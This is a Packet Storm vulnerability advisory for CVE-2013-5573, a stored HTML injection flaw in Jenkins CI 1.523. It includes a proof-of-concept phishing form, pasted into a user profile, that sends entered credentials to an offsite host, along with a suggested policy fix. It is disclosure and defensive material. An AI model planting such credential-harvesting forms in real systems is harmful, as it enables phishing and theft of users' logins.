exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Jenkins CI 1.523 Persistent Script Insertion

Jenkins CI 1.523 Persistent Script Insertion
Posted Dec 19, 2013
Authored by Christian Catalano

Jenkins CI version 1.523 has a default markup formatter that permits offsite-bound forms. This vulnerability could be exploited by a remote attacker (a malicious user) to inject malicious persistent HTML script code (application side) and in turn perform a cross site scripting attack.

tags | exploit, remote, xss
advisories | CVE-2013-5573
SHA-256 | 5764f0eb1aedc4495f9f0a84672d7a2996fc96b4c3ea9d658bcea48cd425c6bf

Jenkins CI 1.523 Persistent Script Insertion

Change Mirror Download
###################################################

01. ### Advisory Information ###

Title: Default markup formatter permits offsite-bound forms
Date published : 2013-12-16
Date of last update: 2013-12-16
Vendors contacted : Jenkins CI v 1.523
Discovered by: Christian Catalano
Severity: Low


02. ### Vulnerability Information ###

CVE reference: CVE-2013-5573
CVSS v2 Base Score: 4.7
CVSS v2 Vector : (AV:N/AC:L/Au:M/C:P/I:P/A:N)
Component/s : Jenkins CI v 1.523
Class : HTML Injection


03. ### Introduction ###

Jenkins CI is an extendable open source continuous integration server
http://jenkins-ci.org.


04. ### Vulnerability Description ###

The default installation and configuration of Jenkins CI is prone to a
security vulnerability. The Jenkins CI default markup formatter permits
offsite-bound forms. This vulnerability could be exploited by a remote
attacker (a malicious user) to inject malicious persistent HTML script
code (application side).


05. ### Technical Description / Proof of Concept Code ###

The vulnerability is located in the 'Descriotion' input field of the
User Configuration function:

https://localhost:9444/jenkins/user/attacker/configure

To reproduce the vulnerability, the attacker (a malicious user) can add
the malicious HTML script code:

<form method="POST" action="http://www.mocksite.org/login/login.php.">
Username: <input type="text" name="username" size="15" /><br />
Password: <input type="password" name="passwort" size="15" /><br />
<div align="center">
<p><input type="submit" value="Login" /></p>
</div>
</form>

in the 'Descriotion' input field and click on save button.
The code execution happens when the victim (an unaware user) view the
'People List'

https://localhost:9444/jenkins/asynchPeople/

and click on attacker user id.


06. ### Business Impact ###

Exploitation of the persistent web vulnerability requires a low
privilege web application user account.
Successful exploitation of the vulnerability results in persistent
phishing and persistent external redirects.


07. ### Systems Affected ###


This vulnerability was tested against:
Jenkins CI v1.523
Older versions are probably affected too, but they were not checked.


08. ### Vendor Information, Solutions and Workarounds ###

Currently, there are no known upgrades or patches to correct this
vulnerability. It is possible to temporarily mitigate the flaw by
implementing the following workaround:
'MyspacePolicy' permits
tag("form", "action", ONSITE_OR_OFFSITE_URL,
"method");

Fix 'MyspacePolicy' by restricting the policy to ONSITE_URL only or
perhaps <form> could be banned entirely.


09. ### Credits ###

This vulnerability has been discovered by:
Christian Catalano aka wastasy ch(dot)catalano(at)gmail(dot)com


10. ### Vulnerability History ###

August 21th, 2013: Vulnerability identification
August 4th, 2013: Vendor notification [Jenkins CI]
November 19th, 2013: Vulnerability confirmation [Jenkins CI]
November 19th, 2013: Vendor Solution
December 16th, 2013: Vulnerability disclosure

11. ### Disclaimer ###

The information contained within this advisory is supplied "as-is" with
no warranties or guarantees of fitness of use or otherwise.
I accept no responsibility for any damage caused by the use or misuse of
this information.

###################################################
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    8 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    11 Files
  • 23
    Apr 23rd
    68 Files
  • 24
    Apr 24th
    23 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close